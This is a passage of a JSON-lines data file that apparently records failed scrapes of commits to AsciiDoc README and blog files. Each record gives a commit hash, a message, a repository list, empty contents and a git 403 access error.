d.lv,berryzed\/tech-blog,eimajenthat\/hubpress.io,Codearte\/hubpress.io,thesagarsutar\/hubpress,plyom\/hubpress.io,rorohiko21\/blog,fastretailing\/blog,apoch\/blog,pepite\/hubpress.io,hinaloe\/hubpress,jpcanovas\/myBlog,magivfer\/pages,ssundarraj\/hubpress.io,jjmean2\/server-study,marksubbarao\/hubpress.io,pascalgrimaud\/hubpress.io,adest\/press,Red5\/red5.github.io,devananda\/devananda.github.io,OlympusOnline2\/announcements,fw4spl-org\/fw4spl-blog,igovsol\/blog,erramuzpe\/gsoc2016,porolakka\/hubpress.io,amberry\/blog,paolo215\/blog,palaxi00\/palaxi00.github.io,bemug\/devblog,shunkou\/blog,akhmetgali\/hubpress.io,SockPastaRock\/hubpress.io,rynop\/rynop.hubpress.io,joescharf\/joescharf.github.io,mkc188\/hubpress.io,lichengzhu\/blog,DimShadoWWW\/blog,Sth0nian\/hubpress.io,hanwencheng\/hanwenblog,pej\/hubpress.io,marksubbarao\/hubpress.io,demiansan\/demiansan.github.io,PerthHackers\/blog,topicusonderwijs\/topicusonderwijs.github.io,benignbala\/hubpress.io,jbutz\/hubpress-test,mufarooqq\/blog,heartnn\/hubpress.io,btsibr\/myhubpress,heartnn\/hubpress.io,mcornell\/OFM,RussellSnyder\/hubpress-test,crobby\/hubpress.io,benignbala\/hubpress.io,gscheibel\/blog,henryouly\/henryouly.github.io,dmacstack\/glob,loetjoe\/blog,celsogg\/blog,apoch\/blog,tom-konda\/blog,BenBals\/hubpress,joshuarrrr\/hubpress.io,jbutz\/hubpress-test,miroque\/shirokuma,jmnarloch\/blog.io,nandansaha\/AroundTheWeb,melix\/hubpress,nthline\/hubpress.io,isaacriquelme\/endata.do,vuthaihoc\/vuthaihoc.github.io,jfavlam\/Concepts,gogonkt\/makenothing,woehrl01\/woehrl01.hubpress.io,sxgc\/blog,DavidTPate\/davidtpate.com,flug\/flug.github.io,arabindamoni\/hubpress.io,dsuryakusuma\/dsuryakusuma.github.io,booleanbalaji\/hubpress.io,ruaqiwei23\/blog,porolakka\/hubpress.io,mufarooqq\/blog,errorval\/blog,aql\/hubpress.io,benignbala\/hubpress.io,Sth0nian\/hubpress.io,mrfgl\/blog,e-scape\/blog,gogonkt\/makenothing,dan-blanchard\/blog,e-scape\/blog,topluluk\/blog,joescharf\/joescharf.github.io,jamarortiz\/pragmaticalware,ben-liu\/hubpress.io,anwfr\/blog.anw.fr,ReadyP1\/hubpress.io,itsmyr4bbit\/blog,pej\/hubpress.io,fw4spl-org\/fw4spl-blog,qingyuqy\/qingyuqy.io,gbougeard\/blog.english,ncomet\/asciiblog,sebarid\/pages,roelvs\/hubpress.io,TeksInHelsinki\/en,jlcurty\/jlcurty.github.io-,nandansaha\/AroundTheWeb,codelab-lbernard\/blog,pepite\/hubpress.io,agentmilindu\/hubpress.io,nicolaschaillot\/pechdencouty,aspick\/hubpress.io,berryzed\/tech-blog,freekrai\/hubpress,jjmean2\/server-study,whelamc\/life,rubyinhell\/hubpress.io,JiajiaGuo\/jiajiaguo.github.io,isaacriquelme\/endata.do,adest\/press,joshuarrrr\/hubpress.io,Lukas238\/the-holodeck,porolakka\/hubpress.io,e-scape\/blog,cmhgroupllc\/blog,jamarortiz\/pragmaticalware,Abdul2\/abdul2.github.io,mikqi\/blog,nandansaha\/AroundTheWeb,christofmarti\/blog,entropyz\/blog,lrabiet\/patisserie,plyom\/hubpress.io,princeminz\/blog,SwarnaKishore\/blog,Perthmastersswimming\/hubpress.io,ucide-coruptia\/ucide-coruptia.ro,entropyz\/blog,SnorlaxH\/blog.urusa.me,kobusb\/blog,filipeuva\/filipeuva.blog,yelangya3826850\/monaenhubpress,RaoUmer\/hubpress.io,crobby\/hubpress.io,pramodjg\/articles,danen-carlson\/blog,RussellSnyder\/hubpress-test,dawn-chiniquy\/clear-project.org,sxgc\/blog,fwalloe\/infosecbriefly,artavels\/pages,Jekin6\/blog,dan-blanchard\/blog,Abdul2\/abdul2.github.io,philippevidal80\/blog,plyom\/hubpress.io,jimmidyson\/testblog,ottoandry\/ottoandry1,bemug\/devblog,sidorares\/sidorares.github.io,abhayghatpande\/hubpress.io,nicksam112\/nicksam112.github.io,RaoUmer\/hubpress.io,porolakka\/hubpress.io,tehbilly\/blog,manelvf\/blog,corporatesanyasi\/corporatesanyasi.github.io,thesagarsutar\/hubpress,lichengzhu\/blog,anthonny\/personal-blog,ErJ101\/hbspractise,henryouly\/henryouly.github.io,marksubbarao\/hubpress.io,brendena\/hubpress.io,crobby\/hubpress.io,trycrmr\/hubpress.io,Bloggerschmidt\/bloggerschmidt.de,ambarishpande\/blog,gogonkt\/makenothing,hutchr\/hutchr.github.io,rorohiko21\/blog,mkent-at-rivermeadow-dot-com\/hubpress.io,adjiebpratama\/press,qingyuqy\/qingyuqy.io,shinnoki\/hubpress.io,ice09\/ice09ng,crobby\/hubpress.io,celsogg\/blog,iKnowMagic\/hubpress.io,Kyrzo\/kyrzo.github.io,paolo215\/blog,BenBals\/hubpress,booleanbalaji\/hubpress.io,philippevidal80\/blog,topicusonderwijs\/topicusonderwijs.github.io,DavidTPate\/davidtpate.com,SnorlaxH\/blog.urusa.me,jsiu22\/blog,crotel\/studio,ludolphus\/hubpress.io,cmhgroupllc\/blog,ditirambo\/ditirambo.es,rh0\/the-myriad-path,DaOesten\/hubpress.io,pdudits\/hubpress,anshu92\/blog,thaibeouu\/blog,julianrichen\/blog,IEEECompute\/blog,abesn\/hubpress.io,ice09\/ice09ng,Jekin6\/blog,ncomet\/asciiblog,arseniuss\/blog.arseniuss.id.lv,jcsirot\/hubpress.io,fghhfg\/hubpress.io,JacobSamro\/blog,artavels\/pages,SnorlaxH\/blog.urusa.me,OdieD8\/hubpress.io,pramodjg\/articles,entropyz\/blog,xinmeng1\/note,devananda\/devananda.github.io,palaxi00\/palaxi00.github.io,crotel\/studio,princeminz\/blog,MirumSG\/agencyshowcase,Port666\/hubpress.io,palaxi00\/palaxi00.github.io,sakkemo\/blog,anandjagadeesh\/blog,sanctumware\/hubpress,liyucun\/blog,chackomathew\/blog,anthonny\/personal-blog,simonturesson\/hubpresstestsimon,binout\/javaonemorething,anthonny\/personal-blog,pepite\/hubpress.io,schweitzer\/hubpress.io,anwfr\/blog.anw.fr,jmini\/hubpress.io,hutchr\/hutchr.github.io,paolo215\/blog,nthline\/hubpress.io,heartnn\/hubpress.io,loetjoe\/blog,binout\/javaonemorething,sebprev\/blog,atomfrede\/shiny-adventure,ben-liu\/hubpress.io,chackomathew\/blog,ashalkhakov\/hubpress.io,hva314\/blog,jjmean2\/server-study,HubPress\/demo.hubpress.io,codetricity\/journey,ml4den\/hubpress,jfavlam\/Concepts,adamperer\/diary,alexknowshtml\/thebigmove,devananda\/devananda.github.io,simpleHoChun\/blog,pdudits\/pdudits.github.io,tmdgus0118\/blog.code404.co.kr,igovsol\/blog,IEEECompute\/blog,errorval\/blog,gscheibel\/blog,cmolitor\/blog,hiun\/hubpress.io,RaoUmer\/hubpress.io,anandjagadeesh\/blog,ottoandry\/ottoandry1,elinep\/blog,gilangdanu\/blog,eimajenthat\/hubpress.io,Jekin6\/blog,duggiemitchell\/JavascriptMuse,semarium\/blog,jcsirot\/hubpress.io,codelab-lbernard\/blog,OdieD8\/hubpress.io,kim0\/hubpress.io,koter84\/blog,palaxi00\/palaxi00.github.io,codetricity\/journey,filipeuva\/filipeuva.blog,rubyinhell\/hubpress.io,btsibr\/myhubpress,lichengzhu\/blog,Cribstone\/humblehacker,tehbilly\/blog,AlexL777\/hubpressblog,demiansan\/demiansan.github.io,woehrl01\/woehrl01.hubpress.io,mathieu-pousse\/hubpress.io,sxgc\/blog,manelvf\/blog,apoch\/blog,rrrhys\/blog.codeworkshop.com.au,adjiebpratama\/press,gogonkt\/makenothing,anwfr\/blog.anw.fr,alexknowshtml\/thebigmove,pej\/hubpress.io,Jekin6\/blog,Port666\/hubpress.io,Abdul2\/abdul2.github.io,anshu92\/blog,sakkemo\/blog,crotel\/meditation","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SockPastaRock\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b8815337290e2f4fee3592e62b97bc8303e4468","subject":"Create README.adoc","message":"Create README.adoc","repos":"MatousJobanek\/smart-testing,MatousJobanek\/smart-testing,arquillian\/smart-testing,arquillian\/smart-testing,arquillian\/smart-testing,MatousJobanek\/smart-testing","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MatousJobanek\/smart-testing.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c6d054a93f7079fa0aa9356a1c07b6831f832548","subject":"Add readme","message":"Add readme\n","repos":"ivargrimstad\/security-samples,ivargrimstad\/security-samples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/security-samples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd3c4286fb1e18c92c4ea254f6c82fc15a2fc02a","subject":"Update dependency list in README","message":"Update dependency list in README\n","repos":"rumpelsepp\/pynote","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ca1f40f1b231f42888b85806aca7cbbe0e64800","subject":"Remove comment","message":"Remove comment","repos":"prateepb\/spiracle,prateepb\/spiracle,waratek\/spiracle,waratek\/spiracle,waratek\/spiracle,prateepb\/spiracle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateepb\/spiracle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1000e0f4c6b3de2aa4618f1eebf8a85cc9a0ed95","subject":"Create README.adoc","message":"Create README.adoc","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3df1ef5fdfea8eaffd1a6a6fae9ffc832b093c8","subject":"Updated TravisCI badge","message":"Updated TravisCI badge","repos":"resilience4j\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,mehtabsinghmann\/resilience4j,drmaas\/resilience4j,drmaas\/resilience4j,goldobin\/resilience4j,RobWin\/javaslang-circuitbreaker,javaslang\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83045d9f29d18412ce49a0ef668ace7130a855b3","subject":"Updated README credit URL","message":"Updated README credit URL\n\nNecessary to pick up new author profile URL.\n","repos":"bkuhlmann\/alfred","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/alfred.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c7124741216c7a98c66b3a70208b0d808ca6201","subject":"doc: add man page for daniel-parse","message":"doc: add man page for daniel-parse\n\nSigned-off-by: brian m. carlson <738bdd359be778fee9f0fc4e2934ad72f436ceda@crustytoothpaste.net>\n","repos":"bk2204\/daniel-ruby,bk2204\/daniel-ruby","old_file":"doc\/daniel-parse.adoc","new_file":"doc\/daniel-parse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bk2204\/daniel-ruby.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"716f19409c6d83403db0d257ba82894fdf1d2cfa","subject":"Document --bind option in README","message":"Document --bind option in README","repos":"zorkian\/nagios-api,numkem\/nagios-api,numkem\/nagios-api,Webtrends\/nagios-api,Wikia\/nagios-api,heftyy\/nagios-api,zorkian\/nagios-api,heftyy\/nagios-api,al4\/nagios-api,al4\/nagios-api,Webtrends\/nagios-api,Wikia\/nagios-api","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/al4\/nagios-api.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"358d1b92c2b20bc03ca039d4ccbb8a6ff677f063","subject":"updated readme","message":"updated readme\n","repos":"S-Mach\/s_mach.datadiff","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/S-Mach\/s_mach.datadiff.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e271cf2ebda1c812db20e6db89b4b1f86e98e4e","subject":"Place link to godocs in README.","message":"Place link to godocs in README.\n","repos":"larsbutler\/gophercloud,clintonskitson\/gophercloud,feiskyer\/gophercloud,timbyr\/gophercloud,rgbkrk\/gophercloud,clintonskitson\/gophercloud,dudymas\/gophercloud,trumant\/gophercloud,jamiehannaford\/gophercloud,DSpeichert\/gophercloud,larsbutler\/gophercloud,pratikmallya\/gophercloud,dudymas\/gophercloud,jarosser06\/gophercloud,rackspace\/gophercloud,trumant\/gophercloud,DSpeichert\/gophercloud,rackspace\/gophercloud,rgbkrk\/gophercloud,jarosser06\/gophercloud,feiskyer\/gophercloud,carolynvs\/gophercloud,pratikmallya\/gophercloud,mitchellh\/gophercloud-fork-40444fb,carolynvs\/gophercloud,sti-jans\/gophercloud,timbyr\/gophercloud,jamiehannaford\/gophercloud,sti-jans\/gophercloud,mitchellh\/gophercloud-fork-40444fb","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clintonskitson\/gophercloud.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4aed388980b606e6bb1ffedaa0e1d28dc7438cf5","subject":"Update readme - release instructions might have been wrong w.r.t archive generation. #263","message":"Update readme - release instructions might have been wrong w.r.t archive generation. #263\n","repos":"mike-tr-adamson\/incubator-tinkerpop,jorgebay\/tinkerpop,velo\/incubator-tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,PommeVerte\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,robertdale\/tinkerpop,n-tran\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,newkek\/incubator-tinkerpop,velo\/incubator-tinkerpop,artem-aliev\/tinkerpop,apache\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,RedSeal-co\/incubator-tinkerpop,krlohnes\/tinkerpop,apache\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,newkek\/incubator-tinkerpop,krlohnes\/tinkerpop,apache\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,apache\/tinkerpop,samiunn\/incubator-tinkerpop,artem-aliev\/tinkerpop,gdelafosse\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,dalaro\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,apache\/tinkerpop,velo\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,Lab41\/tinkerpop3,apache\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,edgarRd\/incubator-tinkerpop,RedSeal-co\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,gdelafosse\/incubator-tinkerpop,krlohnes\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,artem-aliev\/tinkerpop,PommeVerte\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,gdelafosse\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,RedSeal-co\/incubator-tinkerpop,mpollmeier\/tinkerpop3,rmagen\/incubator-tinkerpop,artem-aliev\/tinkerpop,vtslab\/incubator-tinkerpop,mpollmeier\/tinkerpop3,Lab41\/tinkerpop3,rmagen\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,jorgebay\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,rmagen\/incubator-tinkerpop,newkek\/incubator-tinkerpop,robertdale\/tinkerpop","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jorgebay\/tinkerpop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1cab70f2eae767bda0c55c1e9c62826087b3ae50","subject":"touchup on README.asciidoc to tickle a build","message":"touchup on README.asciidoc to tickle a build","repos":"araisrobo\/machinekit,strahlex\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,mhaberler\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,mhaberler\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,araisrobo\/machinekit,mhaberler\/machinekit,strahlex\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,mhaberler\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,araisrobo\/machinekit","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/araisrobo\/machinekit.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"9548a8b7f70037c0eb248b2fd239cc2c41a9f774","subject":"Added a README file.","message":"Added a README file.\n","repos":"lento\/cortex,hradec\/cortex,davidsminor\/cortex,danieldresser\/cortex,davidsminor\/cortex,danieldresser\/cortex,lento\/cortex,davidsminor\/cortex,hradec\/cortex,appleseedhq\/cortex,davidsminor\/cortex,hradec\/cortex,lento\/cortex,goddardl\/cortex,danieldresser\/cortex,appleseedhq\/cortex,appleseedhq\/cortex,danieldresser\/cortex,goddardl\/cortex,goddardl\/cortex","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/davidsminor\/cortex.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"03e7f15d3d1dcea70dd6b0510754ef622d72260c","subject":"Add CI badge","message":"Add CI badge\n","repos":"NetcomKassel\/sinatra-swagger-exposer,archiloque\/sinatra-swagger-exposer,NetcomKassel\/sinatra-swagger-exposer","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NetcomKassel\/sinatra-swagger-exposer.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3eda99ac4f978b799edeb213c9d7f79b7f4ccc2","subject":"readme update","message":"readme update\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,atuljangra\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inserpio\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87154f4a39c77ab92d80f3effa58de3000921127","subject":"[docs] Add admin workflow for recovering from disk failure","message":"[docs] Add admin workflow for recovering from disk failure\n\nI didn't document how to rebalance tablets onto the repaired tserver if\nnecessary, since the process is complicated and error prone, and we hope\nto have a rebalancing tool in the future. These docs will quickly become\noutdated when KUDU-616 is fixed, but I think it's worth it to document\nsince we frequently receive questions on the topic.\n\nChange-Id: I6541bffc5e9546c523df610fd8c025dd05e403bf\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6606\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\n","repos":"cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b4e48ba6a2e308346c07e95b079075b302661206","subject":"Add PBR article part one","message":"Add PBR article part one","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/pbr_part1.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/pbr_part1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"94774a9bff77b7726c212f27b7ff250310a60db9","subject":"Updated documentation","message":"Updated documentation\n","repos":"ronsmits\/markup-document-builder,Swagger2Markup\/markup-document-builder,johanhammar\/markup-document-builder","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ronsmits\/markup-document-builder.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4b0a2dc649c61ce2e7de0a155b766c67acbcbf68","subject":"Fixes to the documentation based on the PR review","message":"Fixes to the documentation based on the PR review\n","repos":"r0h4n\/node-agent,Tendrl\/node_agent,Tendrl\/node-agent,Tendrl\/node-agent,Tendrl\/node_agent,r0h4n\/node-agent,r0h4n\/node-agent,Tendrl\/node-agent","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/r0h4n\/node-agent.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"c184400dee0008be7eecad62e0fdb709527aa003","subject":"added readme","message":"added readme\n","repos":"sdaschner\/asciiblog,sdaschner\/asciiblog","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdaschner\/asciiblog.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b094518986b78e92a5d2ea8b453bb911dd484b9f","subject":"added readme","message":"added readme\n","repos":"arun-gupta\/snoop,arun-gupta\/snoop,ivargrimstad\/snoopee,arun-gupta\/snoop,ivargrimstad\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoop","old_file":"snoop-eureka\/README.adoc","new_file":"snoop-eureka\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/snoopee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52d92f507447f0a417d61d2512e3284345aa1bef","subject":"y2b create post Android vs iPhone vs YOU","message":"y2b create post Android vs iPhone vs YOU","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-09-Android-vs-iPhone-vs-YOU.adoc","new_file":"_posts\/2013-09-09-Android-vs-iPhone-vs-YOU.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0ad50365eac26a2744f57646c6575d4ff28288f","subject":"Some rewording. Remove the excerpt from standalone.xml","message":"Some rewording. Remove the excerpt from standalone.xml\n","repos":"jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/installation.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c036096d5e59dbf439086f7046a0ff3417b0462","subject":"Update 2016-07-01-Reading-Between-The-Bits.adoc","message":"Update 2016-07-01-Reading-Between-The-Bits.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-Reading-Between-The-Bits.adoc","new_file":"_posts\/2016-07-01-Reading-Between-The-Bits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6f52802e696a2ba34e26fb784ec70c3fbd59430","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb72f7a6b75524db09cb1f0c9ef9dfcc04c86b61","subject":"Update 2016-01-26-Puzzle-6-Hackipedia.adoc","message":"Update 2016-01-26-Puzzle-6-Hackipedia.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-26-Puzzle-6-Hackipedia.adoc","new_file":"_posts\/2016-01-26-Puzzle-6-Hackipedia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e96dc1c5ad3bc950ac034b156d5ef896e55eb04","subject":"Update 